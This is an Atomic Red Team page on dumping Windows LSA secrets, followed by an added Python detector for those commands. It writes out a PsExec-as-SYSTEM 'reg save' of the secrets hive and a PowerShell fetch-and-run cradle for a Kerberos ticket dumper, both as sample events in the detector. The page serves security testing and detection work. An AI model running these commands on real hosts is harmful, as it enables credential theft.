OS Credential Dumping: LSA Secrets

Description from ATT&CK

Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts.(Citation: Passcape LSA Secrets)(Citation: Microsoft AD Admin Tier Model)(Citation: Tilbury Windows Credentials) LSA secrets are stored in the registry at HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets. LSA secrets can also be dumped from memory.(Citation: ired Dumping LSA Secrets)

The Reg utility can be used to extract the secrets from the Registry. Mimikatz can be used to extract secrets from memory.(Citation: ired Dumping LSA Secrets)

Atomic Tests

Atomic Test #1 - Dumping LSA Secrets

Dump the secrets key from the Windows registry. When successful, the dumped file will be written to $env:Temp\secrets. Attackers may use the secrets key to assist with extracting passwords and enumerating other sensitive system information.

Supported Platforms: windows

auto_generated_guid: 55295ab0-a703-433b-9ca4-ae13807de12f


Inputs:

| Name | Description | Type | Default Value |
| --- | --- | --- | --- |
| psexec_exe | Path to PsExec executable | path | PathToAtomicsFolder\..\ExternalPayloads\T1003.004\bin\PsExec.exe |

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

"#{psexec_exe}" -accepteula -s reg save HKLM\security\policy\secrets %temp%\secrets /y

Cleanup Commands:

del %temp%\secrets >nul 2> nul

Dependencies: Run with powershell!

Description: PsExec from Sysinternals must exist on disk at specified location (#{psexec_exe})

Check Prereq Commands:

if (Test-Path "#{psexec_exe}") {exit 0} else {exit 1}

Get Prereq Commands:

Invoke-WebRequest "" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\"
Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\" "PathToAtomicsFolder\..\ExternalPayloads\PSTools" -Force
New-Item -ItemType Directory (Split-Path "#{psexec_exe}") -Force | Out-Null
Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\PSTools\PsExec.exe" "#{psexec_exe}" -Force

Atomic Test #2 - Dump Kerberos Tickets from LSA using dumper.ps1

This tool allows you to dump Kerberos tickets from the LSA cache. Implemented via Add-Type. If the tool is run as a privileged user, it will automatically obtain NT AUTHORITY\SYSTEM privileges and then dump all tickets. If the tool is run as a non-privileged user, it will only dump tickets from the current logon session. Ref: Author of dumper.ps1: Michael Zhmaylo (@MzHmO)

Supported Platforms: windows

auto_generated_guid: 2dfa3bff-9a27-46db-ab75-7faefdaca732



Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

Invoke-Expression (New-Object Net.WebClient).DownloadString('')
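Both tests above leave a recognisable process-creation trail: test #1 is a `reg save` of the SECURITY hive wrapped in PsExec `-s` (so the `reg.exe` child runs as SYSTEM under `PSEXESVC.exe`), and test #2 is an Invoke-Expression/DownloadString cradle. The detection logic below is an added example and is not part of Atomic Red Team or the dumper.ps1 project. It assumes an event layout with the fields of a Windows Security 4688 or Sysmon process-creation record (new process, command line, parent process); every sample event is constructed rather than real telemetry, and the download URL, which the page elides, is a placeholder. The hive rule deliberately generalises beyond the page's command to SYSTEM and SAM saves as well, since the SYSTEM hive holds the boot key needed to decrypt the secrets and SAM is dumped the same way.

```python
"""Detection logic for the two atomic tests on this page: a reg save/export of
a credential hive (test #1, including the PsExec -s wrapper and the reg.exe child
spawned by PSEXESVC) and the Invoke-Expression/DownloadString cradle (test #2).

Added example, not Atomic Red Team code. Event fields mirror a Security 4688 /
Sysmon 1 record; all sample events are constructed and the URL is a placeholder.
"""
import re
from dataclasses import dataclass
from typing import Callable, List, Tuple


@dataclass
class ProcEvent:
    new_process: str
    command_line: str
    parent_process: str = ""


def _cmdline(pattern: str) -> Callable[[ProcEvent], bool]:
    """Build a predicate that matches a case-insensitive regex against the command line."""
    rx = re.compile(pattern, re.IGNORECASE)
    return lambda e: rx.search(e.command_line) is not None


# Each rule is (name, predicate). The first rule generalises the page's command to any
# reg save/export of the SECURITY, SYSTEM or SAM hive (assumption: these three hives are
# the ones worth alerting on for offline credential extraction).
RULES: List[Tuple[str, Callable[[ProcEvent], bool]]] = [
    ("reg_save_credential_hive",
     _cmdline(r'\breg(\.exe)?\s+(save|export)\s+"?(hklm|hkey_local_machine)\\(security|system|sam)\b')),
    ("psexec_system_context_reg_save",
     _cmdline(r'psexec(64)?(\.exe)?\b.*\s-s\b.*\breg(\.exe)?\s+save')),
    ("reg_spawned_by_psexesvc",
     lambda e: e.parent_process.lower().endswith("psexesvc.exe")
     and e.new_process.lower().endswith("reg.exe")),
    ("powershell_download_cradle",
     _cmdline(r'(\biex\b|invoke-expression).*downloadstring\s*\(')),
]


def evaluate(event: ProcEvent) -> List[str]:
    """Return the names of every rule the event matches, in rule order."""
    return [name for name, pred in RULES if pred(event)]


def scan(events: List[ProcEvent]) -> List[Tuple[ProcEvent, List[str]]]:
    """Return (event, matched rule names) for each event that hits at least one rule."""
    findings = []
    for event in events:
        hits = evaluate(event)
        if hits:
            findings.append((event, hits))
    return findings


# Constructed sample events (not real logs). Event 0 is the page's attack command as seen
# on the PsExec process; event 1 is the reg.exe child PSEXESVC launches as SYSTEM;
# events 2 and 4 are benign look-alikes; event 3 is the cradle from test #2.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\AtomicRedTeam\ExternalPayloads\T1003.004\bin\PsExec.exe",
              r'"C:\AtomicRedTeam\ExternalPayloads\T1003.004\bin\PsExec.exe" -accepteula -s reg save HKLM\security\policy\secrets C:\Users\alice\AppData\Local\Temp\secrets /y',
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Windows\System32\reg.exe",
              r"reg  save HKLM\security\policy\secrets C:\Users\alice\AppData\Local\Temp\secrets /y",
              r"C:\Windows\PSEXESVC.exe"),
    ProcEvent(r"C:\Windows\System32\reg.exe",
              r"reg.exe save HKLM\SOFTWARE\Contoso C:\backup\contoso.hiv",
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -nop -c Invoke-Expression (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/dumper.ps1')",
              r"C:\Windows\explorer.exe"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -Command Get-Process | Out-File C:\Temp\procs.txt",
              r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for event, hits in scan(SAMPLE_EVENTS):
        print(f"{', '.join(hits):50} <- {event.command_line}")
```

The parent-process rule matters because the `reg.exe` launched through PsExec `-s` carries none of the PsExec tokens in its own command line; correlating on `PSEXESVC.exe` as the parent (or on the service-install event PsExec generates) catches it even if the outer command line is missed. Whole-hive saves (`reg save HKLM\SECURITY ...`) are matched alongside the narrower `Policy\Secrets` path used on this page.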